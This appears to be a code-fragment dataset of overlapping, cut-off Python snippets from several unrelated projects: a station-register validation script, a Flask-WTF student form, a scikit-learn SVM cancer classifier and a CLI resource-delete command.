"'__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx'",
"list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' #",
"# fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import')",
"LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37 @author: a002028 \"\"\" from stations.main",
"app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx'",
"# writer='validation_log', # data=ValidatorLog.log # ) # # app.write_list( # writer='shark_master', # list_names=['master',",
"#, 'master') # from stations.validators.validator import ValidatorLog # app.write_list( # writer='validation_log', # data=ValidatorLog.log",
"# file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) # print('shapes read') # #",
"app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' #",
"list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator import ValidatorLog # app.write_list( #",
"writer='stnreg', list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) # print('shapes",
"Created on 2020-10-01 16:37 @author: a002028 \"\"\" from stations.main import App if __name__",
"app.write_list( # writer='validation_log', # data=ValidatorLog.log # ) # # app.write_list( # writer='shark_master', #",
"'master') # from stations.validators.validator import ValidatorLog # app.write_list( # writer='validation_log', # data=ValidatorLog.log #"
] |
[
"validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email',",
"database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN is already",
"already there in the database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info: raise",
"is already there in the database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info:",
"info: raise ValidationError('This Roll No is already there in the database.') def validate_prn(self,prn):",
"SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models import Info import email_validator",
"submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll",
"= StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)])",
"info: raise ValidationError('This Mobile Number is already there in the database.') def validate_email(self,email):",
"email = StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)])",
"StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state",
"= Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll No is already there in the",
"validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN is already there in",
"if info: raise ValidationError('This Mobile Number is already there in the database.') def",
"mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name',",
"= Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email is already there in the database.')",
"from wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models import Info import email_validator class sisForm(FlaskForm):",
"No', validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo =",
"= SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll No",
"StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()]) city",
"info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll No is already there in",
"Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll No is already there in the database.')",
"there in the database.') class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password =",
"name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(),",
"StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo",
"No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email =",
"StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info =",
"sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name =",
"class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password = PasswordField('Password', validators=[DataRequired(),Length(min=2,max=10)]) submit =",
"if info: raise ValidationError('This PRN is already there in the database.') def validate_mobNo(self,mobNo):",
"StringField, SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models import Info import",
"validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email is already there in",
"if info: raise ValidationError('This Email is already there in the database.') class adminForm(FlaskForm):",
"the database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile Number",
"Email,DataRequired,Length, ValidationError from SIS.models import Info import email_validator class sisForm(FlaskForm): rollNo = StringField('Roll",
"email_validator class sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)])",
"= StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info",
"Info import email_validator class sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll",
"import FlaskForm from wtforms import StringField, SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError",
"the database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email is",
"info = Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email is already there in the",
"adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password = PasswordField('Password', validators=[DataRequired(),Length(min=2,max=10)]) submit = SubmitField('Submit')",
"wtforms import StringField, SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models import",
"= Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile Number is already there in the",
"ValidationError('This PRN is already there in the database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first()",
"SIS.models import Info import email_validator class sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()]) prn",
"already there in the database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info: raise",
"import Info import email_validator class sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()]) prn =",
"StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise",
"validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()]) city =",
"already there in the database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise",
"Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email is already there in the database.') class",
"StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit =",
"= StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)])",
"PRN is already there in the database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if",
"raise ValidationError('This Mobile Number is already there in the database.') def validate_email(self,email): info",
"= StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()])",
"from wtforms import StringField, SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models",
"import Email,DataRequired,Length, ValidationError from SIS.models import Info import email_validator class sisForm(FlaskForm): rollNo =",
"validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile",
"def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email is already there",
"ValidationError('This Roll No is already there in the database.') def validate_prn(self,prn): info =",
"in the database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile",
"raise ValidationError('This PRN is already there in the database.') def validate_mobNo(self,mobNo): info =",
"database.') class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password = PasswordField('Password', validators=[DataRequired(),Length(min=2,max=10)]) submit",
"ValidationError from SIS.models import Info import email_validator class sisForm(FlaskForm): rollNo = StringField('Roll No',",
"is already there in the database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info:",
"No', validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state =",
"SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll No is",
"StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)]) email",
"= StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit",
"= StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No', validators=[DataRequired(),Length(min=9,max=10)])",
"validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit')",
"Email is already there in the database.') class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(),",
"validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first()",
"in the database.') class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password = PasswordField('Password',",
"validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile Number is already there",
"validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This",
"import StringField, SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models import Info",
"from SIS.models import Info import email_validator class sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()])",
"if info: raise ValidationError('This Roll No is already there in the database.') def",
"is already there in the database.') class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()])",
"info: raise ValidationError('This Email is already there in the database.') class adminForm(FlaskForm): email",
"Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def",
"city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo):",
"class sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name",
"info: raise ValidationError('This PRN is already there in the database.') def validate_mobNo(self,mobNo): info",
"validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll No is already there",
"there in the database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This",
"Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile Number is already there in the database.')",
"ValidationError('This Email is already there in the database.') class adminForm(FlaskForm): email = StringField('Email',",
"prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) mobNo = StringField('Mobile No',",
"= Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN is already there in the database.')",
"def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile Number is already",
"raise ValidationError('This Email is already there in the database.') class adminForm(FlaskForm): email =",
"import email_validator class sisForm(FlaskForm): rollNo = StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll No',",
"wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models import Info import email_validator class sisForm(FlaskForm): rollNo",
"validators=[DataRequired(),Length(min=9,max=10)]) email = StringField('Email', validators=[DataRequired(), Email()]) city = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) state = StringField('Name',",
"there in the database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This",
"Roll No is already there in the database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first()",
"database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email is already",
"in the database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN",
"ValidationError('This Mobile Number is already there in the database.') def validate_email(self,email): info =",
"Mobile Number is already there in the database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first()",
"from flask_wtf import FlaskForm from wtforms import StringField, SubmitField, PasswordField from wtforms.validators import",
"in the database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info: raise ValidationError('This Email",
"flask_wtf import FlaskForm from wtforms import StringField, SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length,",
"info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile Number is already there in",
"FlaskForm from wtforms import StringField, SubmitField, PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError from",
"= StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info:",
"Number is already there in the database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if",
"there in the database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This",
"No is already there in the database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if",
"rollNo = StringField('Roll No', validators=[DataRequired()]) prn = StringField('Roll No', validators=[DataRequired(),Length(min=9,max=10)]) name = StringField('Name',",
"def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if info: raise ValidationError('This Roll No is already",
"is already there in the database.') def validate_email(self,email): info = Info.query.filter_by(email=email.data).first() if info:",
"the database.') def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN is",
"def validate_prn(self,prn): info = Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN is already there",
"Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN is already there in the database.') def",
"already there in the database.') class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password",
"the database.') class adminForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password = PasswordField('Password', validators=[DataRequired(),Length(min=2,max=10)])",
"info = Info.query.filter_by(prn=prn.data).first() if info: raise ValidationError('This PRN is already there in the",
"state = StringField('Name', validators=[DataRequired(),Length(min=2,max=40)]) submit = SubmitField('Submit') def validate_rollNo(self,rollNo): info = Info.query.filter_by(rollNo=rollNo.data).first() if",
"raise ValidationError('This Roll No is already there in the database.') def validate_prn(self,prn): info",
"database.') def validate_mobNo(self,mobNo): info = Info.query.filter_by(mobNo=mobNo.data).first() if info: raise ValidationError('This Mobile Number is",
"PasswordField from wtforms.validators import Email,DataRequired,Length, ValidationError from SIS.models import Info import email_validator class"
] |
[
"svm import pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True)",
"= cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test)",
"2, 1, 1, 1, 2, 3, 2, 1]]) example_measures = example_measures.reshape(len(example_measures), -1) prediction",
"pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'], 1))",
"np from sklearn import cross_validation, svm import pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt')",
"import pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X",
"inplace=True) X = np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train, X_test, y_train, y_test =",
"y_train) confidence = clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4, 2, 1, 1, 1,",
"df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train, X_test, y_train,",
"confidence = clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4, 2, 1, 1, 1, 2,",
"np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1]]) example_measures = example_measures.reshape(len(example_measures), -1)",
"import numpy as np from sklearn import cross_validation, svm import pandas as pd",
"y, test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test) print(confidence) example_measures",
"as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'],",
"clf = svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4,",
"svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4, 2, 1,",
"y = np.array(df['class']) X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf =",
"= np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1]]) example_measures = example_measures.reshape(len(example_measures),",
"pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X =",
"import cross_validation, svm import pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'],",
"= clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4, 2, 1, 1, 1, 2, 3,",
"y_test) print(confidence) example_measures = np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1]])",
"= svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4, 2,",
"np.array(df['class']) X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC() clf.fit(X_train,",
"X = np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train, X_test, y_train, y_test = cross_validation.train_test_split(X,",
"y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test,",
"cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test) print(confidence)",
"clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4, 2, 1, 1,",
"clf.score(X_test, y_test) print(confidence) example_measures = np.array([[4, 2, 1, 1, 1, 2, 3, 2,",
"= np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y,",
"1, 1, 1, 2, 3, 2, 1]]) example_measures = example_measures.reshape(len(example_measures), -1) prediction =",
"pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'], 1)) y = np.array(df['class'])",
"1, inplace=True) X = np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train, X_test, y_train, y_test",
"as np from sklearn import cross_validation, svm import pandas as pd df =",
"test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train) confidence = clf.score(X_test, y_test) print(confidence) example_measures =",
"from sklearn import cross_validation, svm import pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999,",
"np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2)",
"y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train) confidence =",
"1, 2, 3, 2, 1]]) example_measures = example_measures.reshape(len(example_measures), -1) prediction = clf.predict(example_measures) print(prediction)",
"df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'], 1)) y",
"= np.array(df['class']) X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC()",
"df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train,",
"X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train)",
"example_measures = np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1]]) example_measures =",
"<filename>SVM/Cancer_prediction.py import numpy as np from sklearn import cross_validation, svm import pandas as",
"cross_validation, svm import pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1,",
"= pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True) df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'], 1)) y =",
"print(confidence) example_measures = np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1]]) example_measures",
"1, 1, 2, 3, 2, 1]]) example_measures = example_measures.reshape(len(example_measures), -1) prediction = clf.predict(example_measures)",
"1)) y = np.array(df['class']) X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf",
"X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2) clf = svm.SVC() clf.fit(X_train, y_train) confidence",
"sklearn import cross_validation, svm import pandas as pd df = pd.read_csv('breast-cancer-wisconsin.data.txt') df.replace('?',-99999, inplace=True)",
"inplace=True) df.drop(['id'], 1, inplace=True) X = np.array(df.drop(['class'], 1)) y = np.array(df['class']) X_train, X_test,",
"numpy as np from sklearn import cross_validation, svm import pandas as pd df"
] |
[
"from __future__ import unicode_literals from django import forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField()",
"django import forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char = forms.CharField( min_length=3, max_length=6)",
"import forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char = forms.CharField( min_length=3, max_length=6) integer",
"boolean = forms.BooleanField() char = forms.CharField( min_length=3, max_length=6) integer = forms.IntegerField( min_value=3, max_value=6)",
"-*- from __future__ import unicode_literals from django import forms class JsonMixinForm(forms.Form): boolean =",
"forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char = forms.CharField( min_length=3, max_length=6) integer =",
"coding:utf-8 -*- from __future__ import unicode_literals from django import forms class JsonMixinForm(forms.Form): boolean",
"__future__ import unicode_literals from django import forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char",
"JsonMixinForm(forms.Form): boolean = forms.BooleanField() char = forms.CharField( min_length=3, max_length=6) integer = forms.IntegerField( min_value=3,",
"# -*- coding:utf-8 -*- from __future__ import unicode_literals from django import forms class",
"from django import forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char = forms.CharField( min_length=3,",
"unicode_literals from django import forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char = forms.CharField(",
"-*- coding:utf-8 -*- from __future__ import unicode_literals from django import forms class JsonMixinForm(forms.Form):",
"class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char = forms.CharField( min_length=3, max_length=6) integer = forms.IntegerField(",
"import unicode_literals from django import forms class JsonMixinForm(forms.Form): boolean = forms.BooleanField() char ="
] |
[
"help=\"Recursive delete of back_refs and children resources\") force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't",
"if resources: message = \"\"\"About to delete: - %s\"\"\" % \"\\n - \".join([self.current_path(r)",
"force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for confirmation\") def _get_back_refs(self, resources, back_refs):",
"ask for confirmation\") def _get_back_refs(self, resources, back_refs): for resource in resources: resource.fetch() if",
"back_ref in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self, paths=None,",
"paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive = Option(\"-r\", action=\"store_true\", default=False, help=\"Recursive",
"- %s\"\"\" % \"\\n - \".join([self.current_path(r) for r in resources]) if force or",
"back_refs) return back_refs def __call__(self, paths=None, recursive=False, force=False): resources = expand_paths(paths, predicate=lambda r:",
"in resources]) if force or continue_prompt(message=message): for r in reversed(resources): print((\"Deleting %s\" %",
"children resources\") force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for confirmation\") def _get_back_refs(self,",
"resource from the API. .. warning:: `-r` option can be used to delete",
"delete of back_refs and children resources\") force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask",
"= self._get_back_refs([back_ref], back_refs) return back_refs def __call__(self, paths=None, recursive=False, force=False): resources = expand_paths(paths,",
"if recursive: resources = self._get_back_refs(resources, []) if resources: message = \"\"\"About to delete:",
"return back_refs def __call__(self, paths=None, recursive=False, force=False): resources = expand_paths(paths, predicate=lambda r: isinstance(r,",
"to delete recursively back_refs of the resource. \"\"\" description = \"Delete a resource\"",
"-*- coding: utf-8 -*- import itertools from ..command import Command, Arg, Option, experimental,",
"Option, experimental, expand_paths from ..resource import Resource from ..utils import continue_prompt @experimental class",
"`-r` option can be used to delete recursively back_refs of the resource. \"\"\"",
"action=\"store_true\", default=False, help=\"Recursive delete of back_refs and children resources\") force = Option(\"-f\", action=\"store_true\",",
"utf-8 -*- import itertools from ..command import Command, Arg, Option, experimental, expand_paths from",
"class Rm(Command): \"\"\"Delete a resource from the API. .. warning:: `-r` option can",
"back_refs): for resource in resources: resource.fetch() if resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for",
"= \"Delete a resource\" paths = Arg(nargs=\"*\", help=\"Resource path(s)\", metavar='path', complete=\"resources::path\") recursive =",
"coding: utf-8 -*- import itertools from ..command import Command, Arg, Option, experimental, expand_paths",
"default=False, help=\"Recursive delete of back_refs and children resources\") force = Option(\"-f\", action=\"store_true\", default=False,",
"for confirmation\") def _get_back_refs(self, resources, back_refs): for resource in resources: resource.fetch() if resource",
"resource in back_refs: back_refs.remove(resource) back_refs.append(resource) for back_ref in itertools.chain(resource.back_refs, resource.children): back_refs = self._get_back_refs([back_ref],",
"and children resources\") force = Option(\"-f\", action=\"store_true\", default=False, help=\"Don't ask for confirmation\") def",
"resources = expand_paths(paths, predicate=lambda r: isinstance(r, Resource)) if recursive: resources = self._get_back_refs(resources, [])",
